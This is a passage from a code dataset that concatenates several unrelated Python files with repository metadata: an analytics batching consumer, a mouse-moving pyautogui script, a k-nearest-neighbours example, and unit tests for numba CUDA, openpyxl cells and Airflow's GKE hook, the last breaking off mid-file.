Thread.__init__(self)
self.daemon = True
self.flush_at = flush_at
self.flush_interval = flush_interval
self.write_key = write_key
self.host = host
self.on_error = on_error
self.queue = queue
self.gzip = gzip
# It's important to set running in the constructor: if we are asked to
self.running = True
self.retries = retries
self.timeout = timeout
def run(self):
self.log.debug('consumer is running...')
while self.running:
self.upload()
self.log.debug('consumer exited.')
def pause(self):
self.running = False
def upload(self):
success = False
batch = self.next()
if len(batch) == 0:
return False
try:
self.request(batch)
success = True
except Exception as e:
self.log.error('error uploading: %s', e)
success = False
if self.on_error:
self.on_error(e, batch)
finally:
for _ in batch:
self.queue.task_done()
return success
def next(self):
queue = self.queue
items = []
start_time = monotonic.monotonic()
total_size = 0
while len(items) < self.flush_at:
elapsed = monotonic.monotonic() - start_time
if elapsed >= self.flush_interval:
break
try:
item = queue.get(
block=True, timeout=self.flush_interval - elapsed)
item_size = len(json.dumps(
item, cls=DatetimeSerializer).encode())
if item_size > MAX_MSG_SIZE:
self.log.error(
'Item exceeds 32kb limit, dropping. (%s)', str(item))
continue
items.append(item)
total_size += item_size
if total_size >= BATCH_SIZE_LIMIT:
self.log.debug(
'hit batch size limit (size: %d)', total_size)
break
except Empty:
break
return items
def request(self, batch):
def fatal_exception(exc):
if isinstance(exc, APIError):
return (400 <= exc.status < 500) and exc.status != 429
else:
# retry on all other errors (eg. network)
return False
@backoff.on_exception(
backoff.expo,
Exception,
max_tries=self.retries + 1,
giveup=fatal_exception)
def send_request():
post(self.write_key, self.host, gzip=self.gzip,
timeout=self.timeout, batch=batch)
send_request()
| true
| true
|
1c3e8090dc3d1bdc87269a5e3aa02ad54cb1c41d
| 276
|
py
|
Python
|
moveMouse.py
|
helloprasanna/python
|
1f218ddf84bc082dca5906833238389011ae344b
|
[
"MIT"
] | null | null | null |
moveMouse.py
|
helloprasanna/python
|
1f218ddf84bc082dca5906833238389011ae344b
|
[
"MIT"
] | null | null | null |
moveMouse.py
|
helloprasanna/python
|
1f218ddf84bc082dca5906833238389011ae344b
|
[
"MIT"
] | null | null | null |
import pyautogui
import time
print('Press Ctrl-C to quit.')
try:
while True:
x, y = pyautogui.position()
pyautogui.moveTo(x+5, y+5)
print('X : {}, Y : {} '.format(x, y))
time.sleep(5)
except KeyboardInterrupt:
print('Terminated \n')
| 18.4
| 45
| 0.57971
|
import pyautogui
import time
print('Press Ctrl-C to quit.')
try:
while True:
x, y = pyautogui.position()
pyautogui.moveTo(x+5, y+5)
print('X : {}, Y : {} '.format(x, y))
time.sleep(5)
except KeyboardInterrupt:
print('Terminated \n')
| true
| true
|
1c3e81161bf35beb9539000f3765d21bce5ca285
| 2,020
|
py
|
Python
|
code/knn.py
|
sornalingam/ml-glossary
|
1ef2d23fb73ed785fda9b5d37d465d6d05c80f37
|
[
"MIT"
] | 4
|
2020-09-26T01:26:28.000Z
|
2021-08-05T20:54:04.000Z
|
code/knn.py
|
tusharmishra288/ml-glossary
|
eac8d91097d6f16801d46cf0c68ae667f49f0eda
|
[
"MIT"
] | null | null | null |
code/knn.py
|
tusharmishra288/ml-glossary
|
eac8d91097d6f16801d46cf0c68ae667f49f0eda
|
[
"MIT"
] | null | null | null |
from collections import Counter
from math import sqrt
def euclidean_distance(point1, point2):
distance = 0
for i in range(len(point1)):
distance +=(point1[i] - point2[i]) ** 2
return sqrt(distance)
def mean(labels):
return sum(labels) / len(labels)
def mode(labels):
return Counter(labels).most_common(1)[0][0]
def KNN(training_data, target, k, func):
neighbors= []
# For each example in the training_data
for index, data in enumerate(training_data):
# distance between the target data and the current example from the data.
distance = euclidean_distance(data[:-1], target)
neighbors.append((distance, index))
sorted_neighbors = sorted(neighbors)
#Pick the first K entries from the sorted list
k_nearest = sorted_neighbors[:k]
# Get the labels of the selected K entries
k_nearest_labels = [training_data[i][1] for distance, i in k_nearest]
# If regression return the mean & if classification return the mode of the K labels.
return k_nearest , func(k_nearest_labels)
def main():
"""
# Regression Data(Column 0 : Height(inch), Column 1: Weight(lb))
"""
reg_data = [
[73.84, 241.89],
[68.78, 162.31],
[74.11, 212.74],
[71.73, 220.04],
[69.88, 206.34],
[67.25, 152.21],
[63.45, 156.39]
]
target_data = [70]
reg_k_nearest_neighbors, reg_prediction = KNN(
reg_data, target_data, k=3, func=mean
)
print(reg_prediction)
'''
# Classification Data( Column 0: age, Column 1:like paragliding or not )
'''
clf_data = [
[26, 1],
[20, 1],
[22, 1],
[19, 1],
[28, 0],
[33, 0],
[30, 0],
[50, 0],
]
target_data2 = [32]
clf_k_nearest_neighbors, clf_prediction = KNN(
clf_data, target_data2, k=3, func=mode
)
print(clf_prediction)
if __name__ == '__main__':
main()
| 26.933333
| 89
| 0.585149
|
from collections import Counter
from math import sqrt
def euclidean_distance(point1, point2):
distance = 0
for i in range(len(point1)):
distance +=(point1[i] - point2[i]) ** 2
return sqrt(distance)
def mean(labels):
return sum(labels) / len(labels)
def mode(labels):
return Counter(labels).most_common(1)[0][0]
def KNN(training_data, target, k, func):
neighbors= []
for index, data in enumerate(training_data):
distance = euclidean_distance(data[:-1], target)
neighbors.append((distance, index))
sorted_neighbors = sorted(neighbors)
k_nearest = sorted_neighbors[:k]
k_nearest_labels = [training_data[i][1] for distance, i in k_nearest]
return k_nearest , func(k_nearest_labels)
def main():
reg_data = [
[73.84, 241.89],
[68.78, 162.31],
[74.11, 212.74],
[71.73, 220.04],
[69.88, 206.34],
[67.25, 152.21],
[63.45, 156.39]
]
target_data = [70]
reg_k_nearest_neighbors, reg_prediction = KNN(
reg_data, target_data, k=3, func=mean
)
print(reg_prediction)
clf_data = [
[26, 1],
[20, 1],
[22, 1],
[19, 1],
[28, 0],
[33, 0],
[30, 0],
[50, 0],
]
target_data2 = [32]
clf_k_nearest_neighbors, clf_prediction = KNN(
clf_data, target_data2, k=3, func=mode
)
print(clf_prediction)
if __name__ == '__main__':
main()
| true
| true
|
1c3e81bc03e97828c120842a812e728cfce91939
| 838
|
py
|
Python
|
numba/cuda/tests/cudapy/test_userexc.py
|
uw-ipd/numba
|
26dde2b28cadda403a5549a84dc1698900b23f74
|
[
"BSD-2-Clause"
] | 3
|
2019-09-30T20:00:36.000Z
|
2020-07-13T04:17:15.000Z
|
numba/cuda/tests/cudapy/test_userexc.py
|
uw-ipd/numba
|
26dde2b28cadda403a5549a84dc1698900b23f74
|
[
"BSD-2-Clause"
] | null | null | null |
numba/cuda/tests/cudapy/test_userexc.py
|
uw-ipd/numba
|
26dde2b28cadda403a5549a84dc1698900b23f74
|
[
"BSD-2-Clause"
] | 1
|
2020-05-07T11:36:27.000Z
|
2020-05-07T11:36:27.000Z
|
from __future__ import print_function, absolute_import, division
from numba.cuda.testing import unittest, SerialMixin
from numba import cuda
class MyError(Exception):
pass
class TestUserExc(SerialMixin, unittest.TestCase):
def test_user_exception(self):
@cuda.jit("void(int32)", debug=True)
def test_exc(x):
if x == 1:
raise MyError
elif x == 2:
raise MyError("foo")
test_exc(0) # no raise
with self.assertRaises(MyError) as cm:
test_exc(1)
self.assertEqual("tid=[0, 0, 0] ctaid=[0, 0, 0]", str(cm.exception))
with self.assertRaises(MyError) as cm:
test_exc(2)
self.assertEqual("tid=[0, 0, 0] ctaid=[0, 0, 0]: foo", str(cm.exception))
if __name__ == '__main__':
unittest.main()
| 26.1875
| 81
| 0.601432
|
from __future__ import print_function, absolute_import, division
from numba.cuda.testing import unittest, SerialMixin
from numba import cuda
class MyError(Exception):
pass
class TestUserExc(SerialMixin, unittest.TestCase):
def test_user_exception(self):
@cuda.jit("void(int32)", debug=True)
def test_exc(x):
if x == 1:
raise MyError
elif x == 2:
raise MyError("foo")
test_exc(0)
with self.assertRaises(MyError) as cm:
test_exc(1)
self.assertEqual("tid=[0, 0, 0] ctaid=[0, 0, 0]", str(cm.exception))
with self.assertRaises(MyError) as cm:
test_exc(2)
self.assertEqual("tid=[0, 0, 0] ctaid=[0, 0, 0]: foo", str(cm.exception))
if __name__ == '__main__':
unittest.main()
| true
| true
|
1c3e822ee939e2be140a15ab1d0164a58d5ed646
| 7,384
|
py
|
Python
|
openpyxl/tests/test_cell.py
|
Wyss/customarrayformatter
|
40e395fb272e8e69bf64056748a87c0df716e2a3
|
[
"MIT"
] | null | null | null |
openpyxl/tests/test_cell.py
|
Wyss/customarrayformatter
|
40e395fb272e8e69bf64056748a87c0df716e2a3
|
[
"MIT"
] | null | null | null |
openpyxl/tests/test_cell.py
|
Wyss/customarrayformatter
|
40e395fb272e8e69bf64056748a87c0df716e2a3
|
[
"MIT"
] | null | null | null |
# file openpyxl/tests/test_cell.py
# Copyright (c) 2010-2011 openpyxl
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# @license: http://www.opensource.org/licenses/mit-license.php
# @author: see AUTHORS file
# Python stdlib imports
from datetime import time, datetime, timedelta
# 3rd party imports
from nose.tools import eq_, raises, assert_raises #pylint: disable=E0611
# package imports
from openpyxl.worksheet import Worksheet
from openpyxl.workbook import Workbook
from openpyxl.shared.exc import ColumnStringIndexException, \
CellCoordinatesException, DataTypeException
from openpyxl.shared.date_time import CALENDAR_WINDOWS_1900
from openpyxl.cell import column_index_from_string, \
coordinate_from_string, get_column_letter, Cell, absolute_coordinate
import decimal
def build_dummy_worksheet():
class Ws(object):
class Wb(object):
excel_base_date = CALENDAR_WINDOWS_1900
encoding = 'utf-8'
parent = Wb()
title = "Dummy Worksheet"
return Ws()
def test_coordinates():
column, row = coordinate_from_string('ZF46')
eq_("ZF", column)
eq_(46, row)
@raises(CellCoordinatesException)
def test_invalid_coordinate():
coordinate_from_string('AAA')
@raises(CellCoordinatesException)
def test_zero_row():
coordinate_from_string('AQ0')
def test_absolute():
eq_('$ZF$51', absolute_coordinate('ZF51'))
def test_absolute_multiple():
eq_('$ZF$51:$ZF$53', absolute_coordinate('ZF51:ZF$53'))
def test_column_index():
eq_(10, column_index_from_string('J'))
eq_(270, column_index_from_string('jJ'))
eq_(7030, column_index_from_string('jjj'))
def test_bad_column_index():
@raises(ColumnStringIndexException)
def _check(bad_string):
column_index_from_string(bad_string)
bad_strings = ('JJJJ', '', '$', '1',)
for bad_string in bad_strings:
yield _check, bad_string
def test_column_letter_boundries():
assert_raises(ColumnStringIndexException, get_column_letter, 0)
assert_raises(ColumnStringIndexException, get_column_letter, 18279)
def test_column_letter():
eq_('ZZZ', get_column_letter(18278))
eq_('JJJ', get_column_letter(7030))
eq_('AB', get_column_letter(28))
eq_('AA', get_column_letter(27))
eq_('Z', get_column_letter(26))
def test_initial_value():
ws = build_dummy_worksheet()
cell = Cell(ws, 'A', 1, value='17.5')
eq_(cell.TYPE_NUMERIC, cell.data_type)
class TestCellValueTypes(object):
@classmethod
def setup_class(cls):
ws = build_dummy_worksheet()
cls.cell = Cell(ws, 'A', 1)
def test_1st(self):
eq_(self.cell.TYPE_NULL, self.cell.data_type)
def test_null(self):
self.cell.value = None
eq_(self.cell.TYPE_NULL, self.cell.data_type)
def test_numeric(self):
def check_numeric(value):
self.cell.value = value
eq_(self.cell.TYPE_NUMERIC, self.cell.data_type)
values = (42, '4.2', '-42.000', '0', 0, 0.0001, '0.9999', '99E-02', 1e1, '4', '-1E3', 4, decimal.Decimal('3.14'))
for value in values:
yield check_numeric, value
def test_string(self):
self.cell.value = 'hello'
eq_(self.cell.TYPE_STRING, self.cell.data_type)
def test_single_dot(self):
self.cell.value = '.'
eq_(self.cell.TYPE_STRING, self.cell.data_type)
def test_formula(self):
self.cell.value = '=42'
eq_(self.cell.TYPE_FORMULA, self.cell.data_type)
self.cell.value = '=if(A1<4;-1;1)'
eq_(self.cell.TYPE_FORMULA, self.cell.data_type)
def test_boolean(self):
self.cell.value = True
eq_(self.cell.TYPE_BOOL, self.cell.data_type)
self.cell.value = False
eq_(self.cell.TYPE_BOOL, self.cell.data_type)
def test_leading_zero(self):
self.cell.value = '0800'
eq_(self.cell.TYPE_STRING, self.cell.data_type)
def test_error_codes(self):
def check_error(cell):
eq_(cell.TYPE_ERROR, cell.data_type)
for error_string in self.cell.ERROR_CODES.keys():
self.cell.value = error_string
yield check_error, self.cell
def test_data_type_check():
ws = build_dummy_worksheet()
cell = Cell(ws, 'A', 1)
cell.bind_value(None)
eq_(Cell.TYPE_NULL, cell._data_type)
cell.bind_value('.0e000')
eq_(Cell.TYPE_NUMERIC, cell._data_type)
cell.bind_value('-0.e-0')
eq_(Cell.TYPE_NUMERIC, cell._data_type)
cell.bind_value('1E')
eq_(Cell.TYPE_STRING, cell._data_type)
@raises(DataTypeException)
def test_set_bad_type():
ws = build_dummy_worksheet()
cell = Cell(ws, 'A', 1)
cell.set_explicit_value(1, 'q')
def test_time():
def check_time(raw_value, coerced_value):
cell.value = raw_value
eq_(cell.value, coerced_value)
eq_(cell.TYPE_NUMERIC, cell.data_type)
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
values = (('03:40:16', time(3, 40, 16)), ('03:40', time(3, 40)),)
for raw_value, coerced_value in values:
yield check_time, raw_value, coerced_value
def test_timedelta():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = timedelta(days=1, hours=3)
eq_(cell.value, 1.125)
eq_(cell.TYPE_NUMERIC, cell.data_type)
def test_date_format_on_non_date():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = datetime.now()
cell.value = 'testme'
eq_('testme', cell.value)
def test_set_get_date():
today = datetime(2010, 1, 18, 14, 15, 20, 1600)
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = today
eq_(today, cell.value)
def test_repr():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
eq_(repr(cell), '<Cell Sheet1.A1>', 'Got bad repr: %s' % repr(cell))
def test_is_date():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = datetime.now()
eq_(cell.is_date(), True)
cell.value = 'testme'
eq_('testme', cell.value)
eq_(cell.is_date(), False)
def test_is_not_date_color_format():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = -13.5
cell.style.number_format.format_code = '0.00_);[Red]\(0.00\)'
eq_(cell.is_date(), False)
| 28.291188
| 121
| 0.676192
|
from datetime import time, datetime, timedelta
from nose.tools import eq_, raises, assert_raises
from openpyxl.worksheet import Worksheet
from openpyxl.workbook import Workbook
from openpyxl.shared.exc import ColumnStringIndexException, \
CellCoordinatesException, DataTypeException
from openpyxl.shared.date_time import CALENDAR_WINDOWS_1900
from openpyxl.cell import column_index_from_string, \
coordinate_from_string, get_column_letter, Cell, absolute_coordinate
import decimal
def build_dummy_worksheet():
class Ws(object):
class Wb(object):
excel_base_date = CALENDAR_WINDOWS_1900
encoding = 'utf-8'
parent = Wb()
title = "Dummy Worksheet"
return Ws()
def test_coordinates():
column, row = coordinate_from_string('ZF46')
eq_("ZF", column)
eq_(46, row)
@raises(CellCoordinatesException)
def test_invalid_coordinate():
coordinate_from_string('AAA')
@raises(CellCoordinatesException)
def test_zero_row():
coordinate_from_string('AQ0')
def test_absolute():
eq_('$ZF$51', absolute_coordinate('ZF51'))
def test_absolute_multiple():
eq_('$ZF$51:$ZF$53', absolute_coordinate('ZF51:ZF$53'))
def test_column_index():
eq_(10, column_index_from_string('J'))
eq_(270, column_index_from_string('jJ'))
eq_(7030, column_index_from_string('jjj'))
def test_bad_column_index():
@raises(ColumnStringIndexException)
def _check(bad_string):
column_index_from_string(bad_string)
bad_strings = ('JJJJ', '', '$', '1',)
for bad_string in bad_strings:
yield _check, bad_string
def test_column_letter_boundries():
assert_raises(ColumnStringIndexException, get_column_letter, 0)
assert_raises(ColumnStringIndexException, get_column_letter, 18279)
def test_column_letter():
eq_('ZZZ', get_column_letter(18278))
eq_('JJJ', get_column_letter(7030))
eq_('AB', get_column_letter(28))
eq_('AA', get_column_letter(27))
eq_('Z', get_column_letter(26))
def test_initial_value():
ws = build_dummy_worksheet()
cell = Cell(ws, 'A', 1, value='17.5')
eq_(cell.TYPE_NUMERIC, cell.data_type)
class TestCellValueTypes(object):
@classmethod
def setup_class(cls):
ws = build_dummy_worksheet()
cls.cell = Cell(ws, 'A', 1)
def test_1st(self):
eq_(self.cell.TYPE_NULL, self.cell.data_type)
def test_null(self):
self.cell.value = None
eq_(self.cell.TYPE_NULL, self.cell.data_type)
def test_numeric(self):
def check_numeric(value):
self.cell.value = value
eq_(self.cell.TYPE_NUMERIC, self.cell.data_type)
values = (42, '4.2', '-42.000', '0', 0, 0.0001, '0.9999', '99E-02', 1e1, '4', '-1E3', 4, decimal.Decimal('3.14'))
for value in values:
yield check_numeric, value
def test_string(self):
self.cell.value = 'hello'
eq_(self.cell.TYPE_STRING, self.cell.data_type)
def test_single_dot(self):
self.cell.value = '.'
eq_(self.cell.TYPE_STRING, self.cell.data_type)
def test_formula(self):
self.cell.value = '=42'
eq_(self.cell.TYPE_FORMULA, self.cell.data_type)
self.cell.value = '=if(A1<4;-1;1)'
eq_(self.cell.TYPE_FORMULA, self.cell.data_type)
def test_boolean(self):
self.cell.value = True
eq_(self.cell.TYPE_BOOL, self.cell.data_type)
self.cell.value = False
eq_(self.cell.TYPE_BOOL, self.cell.data_type)
def test_leading_zero(self):
self.cell.value = '0800'
eq_(self.cell.TYPE_STRING, self.cell.data_type)
def test_error_codes(self):
def check_error(cell):
eq_(cell.TYPE_ERROR, cell.data_type)
for error_string in self.cell.ERROR_CODES.keys():
self.cell.value = error_string
yield check_error, self.cell
def test_data_type_check():
ws = build_dummy_worksheet()
cell = Cell(ws, 'A', 1)
cell.bind_value(None)
eq_(Cell.TYPE_NULL, cell._data_type)
cell.bind_value('.0e000')
eq_(Cell.TYPE_NUMERIC, cell._data_type)
cell.bind_value('-0.e-0')
eq_(Cell.TYPE_NUMERIC, cell._data_type)
cell.bind_value('1E')
eq_(Cell.TYPE_STRING, cell._data_type)
@raises(DataTypeException)
def test_set_bad_type():
ws = build_dummy_worksheet()
cell = Cell(ws, 'A', 1)
cell.set_explicit_value(1, 'q')
def test_time():
def check_time(raw_value, coerced_value):
cell.value = raw_value
eq_(cell.value, coerced_value)
eq_(cell.TYPE_NUMERIC, cell.data_type)
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
values = (('03:40:16', time(3, 40, 16)), ('03:40', time(3, 40)),)
for raw_value, coerced_value in values:
yield check_time, raw_value, coerced_value
def test_timedelta():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = timedelta(days=1, hours=3)
eq_(cell.value, 1.125)
eq_(cell.TYPE_NUMERIC, cell.data_type)
def test_date_format_on_non_date():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = datetime.now()
cell.value = 'testme'
eq_('testme', cell.value)
def test_set_get_date():
today = datetime(2010, 1, 18, 14, 15, 20, 1600)
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = today
eq_(today, cell.value)
def test_repr():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
eq_(repr(cell), '<Cell Sheet1.A1>', 'Got bad repr: %s' % repr(cell))
def test_is_date():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = datetime.now()
eq_(cell.is_date(), True)
cell.value = 'testme'
eq_('testme', cell.value)
eq_(cell.is_date(), False)
def test_is_not_date_color_format():
wb = Workbook()
ws = Worksheet(wb)
cell = Cell(ws, 'A', 1)
cell.value = -13.5
cell.style.number_format.format_code = '0.00_);[Red]\(0.00\)'
eq_(cell.is_date(), False)
| true
| true
|
1c3e82cc247161ee1625ccb0cabfc3a4f65f897e
| 14,062
|
py
|
Python
|
tests/providers/google/cloud/hooks/test_kubernetes_engine.py
|
wileeam/airflow
|
f46be8152a4d89c57db4ca46f5b3339e4876b723
|
[
"Apache-2.0"
] | 8
|
2017-04-20T16:15:44.000Z
|
2020-10-11T13:44:10.000Z
|
tests/providers/google/cloud/hooks/test_kubernetes_engine.py
|
devlocalca/airflow
|
58c3542ed25061320ce61dbe0adf451a44c738dd
|
[
"Apache-2.0"
] | 219
|
2017-03-15T18:40:16.000Z
|
2022-02-28T22:52:43.000Z
|
tests/providers/google/cloud/hooks/test_kubernetes_engine.py
|
devlocalca/airflow
|
58c3542ed25061320ce61dbe0adf451a44c738dd
|
[
"Apache-2.0"
] | 3
|
2016-07-14T21:51:10.000Z
|
2020-10-12T13:26:36.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import unittest
import mock
from google.cloud.container_v1.types import Cluster
from mock import PropertyMock
from airflow import AirflowException
from airflow.providers.google.cloud.hooks.kubernetes_engine import GKEHook
TASK_ID = 'test-gke-cluster-operator'
CLUSTER_NAME = 'test-cluster'
TEST_GCP_PROJECT_ID = 'test-project'
GKE_ZONE = 'test-zone'
class TestGKEHookClient(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.client_info",
new_callable=mock.PropertyMock
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook._get_credentials")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.container_v1.ClusterManagerClient")
def test_gke_cluster_client_creation(self, mock_client, mock_get_creds, mock_client_info):
result = self.gke_hook.get_conn()
mock_client.assert_called_once_with(
credentials=mock_get_creds.return_value,
client_info=mock_client_info.return_value
)
self.assertEqual(mock_client.return_value, result)
self.assertEqual(self.gke_hook._client, result)
class TestGKEHookDelete(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_delete_cluster(self, wait_mock, convert_mock, mock_project_id):
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_delete = self.gke_hook._client.delete_cluster = mock.Mock()
self.gke_hook.delete_cluster(name=CLUSTER_NAME, project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_delete.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster_id=CLUSTER_NAME,
retry=retry_mock,
timeout=timeout_mock)
wait_mock.assert_called_once_with(client_delete.return_value)
convert_mock.assert_not_called()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.log")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_delete_cluster_not_found(self, wait_mock, convert_mock, log_mock, mock_project_id):
from google.api_core.exceptions import NotFound
# To force an error
message = 'Not Found'
self.gke_hook._client.delete_cluster.side_effect = NotFound(message=message)
self.gke_hook.delete_cluster(name='not-existing', project_id=TEST_GCP_PROJECT_ID)
wait_mock.assert_not_called()
convert_mock.assert_not_called()
log_mock.info.assert_any_call("Assuming Success: %s", message)
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_delete_cluster_error(self, wait_mock, convert_mock, mock_project_id):
# To force an error
self.gke_hook._client.delete_cluster.side_effect = AirflowException('400')
with self.assertRaises(AirflowException):
self.gke_hook.delete_cluster(name='a-cluster')
wait_mock.assert_not_called()
convert_mock.assert_not_called()
class TestGKEHookCreate(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_proto(self, wait_mock, convert_mock, mock_project_id):
mock_cluster_proto = Cluster()
mock_cluster_proto.name = CLUSTER_NAME
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_create = self.gke_hook._client.create_cluster = mock.Mock()
self.gke_hook.create_cluster(cluster=mock_cluster_proto,
project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_create.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster=mock_cluster_proto,
retry=retry_mock, timeout=timeout_mock)
wait_mock.assert_called_once_with(client_create.return_value)
convert_mock.assert_not_called()
@mock.patch(
'airflow.providers.google.cloud.hooks.base.CloudBaseHook.project_id',
new_callable=PropertyMock,
return_value=None
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_dict(self, wait_mock, convert_mock, mock_project_id):
mock_cluster_dict = {'name': CLUSTER_NAME}
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_create = self.gke_hook._client.create_cluster = mock.Mock()
proto_mock = convert_mock.return_value = mock.Mock()
self.gke_hook.create_cluster(cluster=mock_cluster_dict,
project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_create.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster=proto_mock,
retry=retry_mock, timeout=timeout_mock)
wait_mock.assert_called_once_with(client_create.return_value)
convert_mock.assert_called_once_with(
{'name': 'test-cluster'},
Cluster()
)
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_error(self, wait_mock, convert_mock):
# to force an error
mock_cluster_proto = None
with self.assertRaises(AirflowException):
self.gke_hook.create_cluster(mock_cluster_proto)
wait_mock.assert_not_called()
convert_mock.assert_not_called()
@mock.patch(
'airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook._get_credentials_and_project_id',
return_value=(mock.MagicMock(), TEST_GCP_PROJECT_ID)
)
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.log")
@mock.patch("airflow.providers.google.cloud.hooks.kubernetes_engine.ParseDict")
@mock.patch(
"airflow.providers.google.cloud.hooks.kubernetes_engine.GKEHook.wait_for_operation")
def test_create_cluster_already_exists(self, wait_mock, convert_mock, log_mock, mock_get_credentials):
from google.api_core.exceptions import AlreadyExists
# To force an error
message = 'Already Exists'
self.gke_hook._client.create_cluster.side_effect = AlreadyExists(message=message)
self.gke_hook.create_cluster(cluster={}, project_id=TEST_GCP_PROJECT_ID)
wait_mock.assert_not_called()
self.assertEqual(convert_mock.call_count, 1)
log_mock.info.assert_any_call("Assuming Success: %s", message)
class TestGKEHookGet(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
def test_get_cluster(self):
retry_mock, timeout_mock = mock.Mock(), mock.Mock()
client_get = self.gke_hook._client.get_cluster = mock.Mock()
self.gke_hook.get_cluster(name=CLUSTER_NAME,
project_id=TEST_GCP_PROJECT_ID,
retry=retry_mock,
timeout=timeout_mock)
client_get.assert_called_once_with(project_id=TEST_GCP_PROJECT_ID,
zone=GKE_ZONE,
cluster_id=CLUSTER_NAME,
retry=retry_mock, timeout=timeout_mock)
class TestGKEHook(unittest.TestCase):
def setUp(self):
self.gke_hook = GKEHook(location=GKE_ZONE)
self.gke_hook._client = mock.Mock()
@mock.patch('airflow.providers.google.cloud.hooks.kubernetes_engine.container_v1.'
'ClusterManagerClient')
@mock.patch('airflow.providers.google.cloud.hooks.base.ClientInfo')
